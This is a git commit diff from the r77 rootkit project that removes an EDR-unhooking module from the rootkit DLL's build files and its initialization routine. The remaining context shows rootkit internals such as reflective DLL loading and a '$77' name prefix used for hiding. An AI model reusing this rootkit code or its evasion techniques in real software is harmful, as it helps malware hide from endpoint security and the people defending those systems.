Bugfix: Do not unhook in r77.dll

Martin Fischer · Martin Fischer · commit ed8dea417195 · 2025-01-09T09:07:55.000+01:00
diff --git a/r77-x64/r77-x64.vcxproj b/r77-x64/r77-x64.vcxproj
@@ -28,7 +28,6 @@
   <ImportGroup Label="Shared">
     <Import Project="..\r77api\r77api.vcxitems" Label="Shared" />
     <Import Project="..\r77\r77.vcxitems" Label="Shared" />
-    <Import Project="..\Unhook\Unhook.vcxitems" Label="Shared" />
     <Import Project="..\ReflectiveDllMain\ReflectiveDllMain.vcxitems" Label="Shared" />
   </ImportGroup>
   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
diff --git a/r77-x86/r77-x86.vcxproj b/r77-x86/r77-x86.vcxproj
@@ -28,7 +28,6 @@
   <ImportGroup Label="Shared">
     <Import Project="..\r77api\r77api.vcxitems" Label="Shared" />
     <Import Project="..\r77\r77.vcxitems" Label="Shared" />
-    <Import Project="..\Unhook\Unhook.vcxitems" Label="Shared" />
     <Import Project="..\ReflectiveDllMain\ReflectiveDllMain.vcxitems" Label="Shared" />
   </ImportGroup>
   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
diff --git a/r77.sln b/r77.sln
@@ -183,11 +183,9 @@ Global
 		r77api\r77api.vcxitems*{06af1d64-f2fc-4767-8794-7313c7bb0a40}*SharedItemsImports = 4
 		r77\r77.vcxitems*{06af1d64-f2fc-4767-8794-7313c7bb0a40}*SharedItemsImports = 4
 		ReflectiveDllMain\ReflectiveDllMain.vcxitems*{06af1d64-f2fc-4767-8794-7313c7bb0a40}*SharedItemsImports = 4
-		Unhook\Unhook.vcxitems*{06af1d64-f2fc-4767-8794-7313c7bb0a40}*SharedItemsImports = 4
 		r77api\r77api.vcxitems*{1ba54a13-b390-47b3-9628-b58a2bba193b}*SharedItemsImports = 4
 		r77\r77.vcxitems*{1ba54a13-b390-47b3-9628-b58a2bba193b}*SharedItemsImports = 4
 		ReflectiveDllMain\ReflectiveDllMain.vcxitems*{1ba54a13-b390-47b3-9628-b58a2bba193b}*SharedItemsImports = 4
-		Unhook\Unhook.vcxitems*{1ba54a13-b390-47b3-9628-b58a2bba193b}*SharedItemsImports = 4
 		Helper\Helper.vcxitems*{2d6fdd44-39b1-4ff8-8ae0-60a6b0979f5f}*SharedItemsImports = 4
 		r77api\r77api.vcxitems*{2d6fdd44-39b1-4ff8-8ae0-60a6b0979f5f}*SharedItemsImports = 4
 		Service\Service.vcxitems*{46e171d4-1811-48be-8867-a63c28761d28}*SharedItemsImports = 9
diff --git a/r77/Rootkit.c b/r77/Rootkit.c
@@ -3,16 +3,12 @@
 #include "Config.h"
 #include "r77def.h"
 #include "r77header.h"
-#include "Unhook.h"
 #include <Shlwapi.h>
 
 static BOOL RootkitInitialized;
 
 BOOL InitializeRootkit()
 {
-	// Unhook DLL's that are monitored by EDR.
-	Unhook();
-
 	// If the process starts with $77, do not load r77.
 	WCHAR executablePath[MAX_PATH + 1];
 	if (FAILED(GetModuleFileNameW(NULL, executablePath, MAX_PATH))) return FALSE;
